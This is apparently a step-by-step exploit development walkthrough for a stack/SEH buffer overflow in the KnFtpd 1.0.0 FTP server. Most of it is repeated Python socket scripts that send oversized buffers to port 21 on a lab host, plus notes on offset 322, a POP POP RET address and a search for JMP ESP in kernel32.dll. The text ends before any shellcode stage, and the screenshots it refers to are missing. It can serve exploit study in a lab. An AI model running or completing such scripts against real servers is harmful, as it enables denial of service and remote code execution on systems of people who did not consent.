KnFtpd 1.0.0 exploit

1. make fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

open knftpd and ollydbg, do fuzzing, and this result

after fuzzing see EIP and SEH chain

 this result after press SHIFT + F9 in seh chain

2. create pattern offset and results

edit file fuzzer become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
#buffer = "\x41" * 3000
buffer = "Aa0Aa1Aa2Aa3Aa4A........." #result generate offset

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

3. search value POP r32, POP r32 and RETn, and this result

edit your file fuzzer become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()




   and do fuzzer, this result

4. check with deadbeef
again edit your file fuzzer, become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
#buffer+="\xef\xbe\xad\xde"
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()





and this result

after thet, checking jmp ESP , i am use kernel32.dll, check this result